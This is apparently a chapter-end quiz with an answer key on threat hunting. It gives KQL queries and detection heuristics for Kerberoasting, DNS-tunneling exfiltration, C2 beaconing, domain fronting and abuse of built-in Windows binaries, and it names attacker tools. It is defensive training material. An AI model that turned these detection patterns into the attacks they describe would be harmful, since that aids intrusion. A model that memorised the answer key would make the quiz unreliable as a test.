Quiz — Chapter 38: Advanced Threat Hunting¶
Quiz Instructions
15 questions covering hypothesis-driven hunting, KQL/SPL queries, TTP-based hunting, and hunt program maturity.
Questions¶
1. The defining characteristic that separates threat hunting from traditional detection is:
- [ ] A. Hunters use more expensive tools
- [ ] B. Hunting is proactive and hypothesis-driven; detection is reactive and alert-driven
- [ ] C. Hunting only targets nation-state actors
- [ ] D. Hunting requires live system access, not log analysis
Answer: B
Hypothesis-driven hunting assumes compromise and seeks evidence. Alert-driven detection responds to known signatures. Hunters look for adversary behaviors that have no existing detection coverage.
2. The PEAK Hunting Framework's three hunt types are:
- [ ] A. Tactical, Operational, Strategic
- [ ] B. Intel-based, Technique-based, Domain expertise-based
- [ ] C. Reactive, Proactive, Predictive
- [ ] D. Host-based, Network-based, Cloud-based
Answer: B
PEAK (Prepare, Execute, Act, Know) categorizes hunts as: Intel-based (IOCs from CTI), Technique-based (ATT&CK techniques without IOCs), and Domain expertise-based (hunter intuition/experience). Each requires different data and methods.
3. A hunter suspects Kerberoasting activity. Which KQL query best detects it in Microsoft Defender for Endpoint/Sentinel?
- [ ] A.
SecurityEvent | where EventID == 4625 - [ ] B.
SecurityEvent | where EventID == 4769 and TicketEncryptionType == "0x17" - [ ] C.
DeviceProcessEvents | where ProcessCommandLine has "mimikatz" - [ ] D.
SecurityEvent | where EventID == 4648
Answer: B
Event ID 4769 (Kerberos Service Ticket request) with EncryptionType 0x17 (RC4) indicates Kerberoasting — modern accounts use AES (0x12/0x11). RC4 requests for service accounts from non-service workstations are high-fidelity.
4. Which data source is MOST valuable for hunting Living-off-the-Land (LotL) techniques using LOLBins?
- [ ] A. Firewall logs
- [ ] B. Process creation logs with full command-line arguments (Event ID 4688 or Sysmon Event 1)
- [ ] C. DNS query logs
- [ ] D. NetFlow data
Answer: B
Process creation with command-line is essential for LotL — attackers use legitimate binaries (certutil, mshta, regsvr32) with malicious arguments. Without full command-line capture, these are invisible.
5. [SCENARIO] Your hypothesis: "A threat actor is using DNS tunneling for C2 exfiltration."
Which KQL hunting query pattern would you start with?
- [ ] A.
SecurityEvent | where EventID == 4768 - [ ] B.
DnsEvents | summarize query_count=count(), avg_len=avg(strlen(Name)) by ClientIP | where query_count > 500 and avg_len > 40 - [ ] C.
DeviceNetworkEvents | where RemotePort == 53 - [ ] D.
OfficeActivity | where Operation == "FileDownloaded"
Answer: B
High-volume, long-subdomain DNS queries are the signature of DNS tunneling (tools like iodine, dnscat2). Average query length >40 chars and >500 queries/hour from one host are high-fidelity indicators. Pair with: rare external resolver use, non-standard TTLs.
6. The Sqrrl Threat Hunting Maturity Model Level 0 (Initial) is characterized by:
- [ ] A. Fully automated hypothesis generation and hunting
- [ ] B. Relying entirely on automated alerting — no proactive hunting occurs
- [ ] C. Manual hunting with documented hypotheses
- [ ] D. Hunt teams with dedicated tooling and metrics
Answer: B
Maturity Level 0 (Initial): organization relies purely on IDS/SIEM alerts. No proactive searching. Level 1 adds threat intel-driven IOC lookups. Levels 2–4 progressively add hypothesis-driven, process-driven, and automated hunting.
7. During a hunt, you discover evidence of T1055 (Process Injection) in svchost.exe. The injected code calls back to 192.168.1.100:4444. What should you do FIRST?
- [ ] A. Block 192.168.1.100 at the firewall immediately
- [ ] B. Preserve evidence (memory dump of svchost, network captures), then escalate to IR — do not disrupt attacker awareness
- [ ] C. Kill the svchost process
- [ ] D. Reboot the affected system to clear the injection
Answer: B
Evidence preservation before containment in hunting-to-IR handoff. Immediately blocking may tip off the attacker and prevent further intelligence gathering. IR team decides containment timing. 192.168.1.100 appears to be internal — may indicate lateral movement.
8. Which Sysmon event ID captures network connections with source/destination IP, port, and initiating process?
- [ ] A. Event ID 1 (Process Create)
- [ ] B. Event ID 3 (Network Connection)
- [ ] C. Event ID 11 (File Create)
- [ ] D. Event ID 13 (Registry Value Set)
Answer: B
Sysmon Event ID 3 captures outbound/inbound connections with ProcessName, SourceIP/Port, DestinationIP/Port — essential for hunting C2 beacons, lateral movement, and data exfiltration patterns.
9. [SCENARIO] You're hunting for Cobalt Strike beaconing. Your hypothesis: regular, periodic outbound HTTPS connections to a single external IP with consistent byte sizes.
Which statistical technique would you apply to identify beacon regularity?
- [ ] A. String matching on User-Agent headers
- [ ] B. Inter-arrival time analysis (jitter detection) — calculate standard deviation of connection intervals; low StdDev indicates beaconing
- [ ] C. GeoIP lookup on destination IPs
- [ ] D. SSL certificate CN field matching
Answer: B
Inter-arrival time + jitter analysis: genuine user browsing has high interval variance; beacons have low variance. Formula: stdev(interval) / mean(interval) < 0.1 is high-fidelity beacon indicator. Also check for consistent byte counts (sleep + jitter pattern).
10. The MITRE ATT&CK tactic that threat hunters most commonly target first due to highest ROI is:
- [ ] A. Initial Access (T1xxx)
- [ ] B. Defense Evasion (T1xxx) — broadest category, used in every intrusion
- [ ] C. Persistence (T1xxx) — nearly universal in dwell-time intrusions
- [ ] D. Exfiltration (T1xxx)
Answer: C
Persistence is present in virtually all intrusions with dwell time. Hunting for persistence mechanisms (scheduled tasks, registry run keys, services, WMI subscriptions) yields high hit rates. Defense Evasion (B) is broad but harder to hunt systematically.
11. What is a "hunt package" in mature threat hunting programs?
- [ ] A. A commercial threat intelligence subscription
- [ ] B. A documented, reusable hunting procedure: hypothesis, data requirements, queries, expected findings, and escalation criteria
- [ ] C. A bundle of YARA rules
- [ ] D. A reporting template for hunt findings
Answer: B
Hunt packages are codified, repeatable hunt procedures — enabling consistency across analysts and organizations. They include: hypothesis, ATT&CK mapping, required data sources, detection queries, interpretation guide, and escalation thresholds.
12. Which KQL function is MOST useful for detecting outlier hosts in a large dataset (statistical anomaly detection)?
- [ ] A.
where - [ ] B.
summarize ... | extend z_score = (value - avg_value) / stdev_value - [ ] C.
join - [ ] D.
parse
Answer: B
Z-score calculation in KQL identifies statistical outliers (hosts > 2 or 3 standard deviations from mean). Use with: login counts, bytes transferred, process spawning rates. Pattern: summarize count() | extend zscore = (count_-avg_)/stdev_.
13. [SCENARIO] After a 3-week hunt cycle, you found no confirmed compromises but identified 12 detection gaps and 3 misconfigured log sources.
Is this hunt a success or failure?
- [ ] A. Failure — no threats found means wasted resources
- [ ] B. Success — detection gap identification and log coverage improvement are primary hunt outputs regardless of finding active threats
- [ ] C. Inconclusive — need more time
- [ ] D. Failure — should have found at least one threat
Answer: B
Hunt success is measured by detection improvement, not solely by finding active threats. 12 new detection rules + 3 fixed log gaps significantly improve security posture. "Clean hunt" with coverage improvements is a strong positive outcome.
14. Domain fronting as a C2 evasion technique is best detected by:
- [ ] A. Blocking Tor exit nodes
- [ ] B. Comparing TLS SNI hostname to HTTP Host header — mismatch indicates domain fronting
- [ ] C. Blocking CDN IP ranges
- [ ] D. Monitoring for unusual DNS query volume
Answer: B
SNI vs Host header mismatch: legitimate CDN traffic has matching SNI and Host. Domain fronting sends SNI=legitimate-cdn.com but Host: malicious-c2.example.com. SSL inspection at proxy layer can expose this discrepancy.
15. The recommended cadence for running routine hunt operations in a mature program is:
- [ ] A. Only when an incident occurs
- [ ] B. Annually during compliance audits
- [ ] C. Continuously or on a defined sprint cycle (2–4 weeks), separate from IR operations
- [ ] D. Monthly, only on critical assets
Answer: C
Continuous or sprint-based hunting (2–4 week cycles) maintains coverage across the ATT&CK matrix. Each sprint targets new hypotheses or retests previous assumptions with updated data. Hunting only during incidents (A) is reactive, not proactive.
Score Interpretation¶
| Score | Level |
|---|---|
| 13–15 | Expert — GCTH/hunt team lead ready |
| 10–12 | Proficient — solid hunting methodology |
| 7–9 | Developing — practice KQL and review hunt frameworks |
| <7 | Foundational — revisit Chapter 38 fully |
Key References: PEAK Framework, Sqrrl Maturity Model, MITRE ATT&CK, Sigma rules, KQL documentation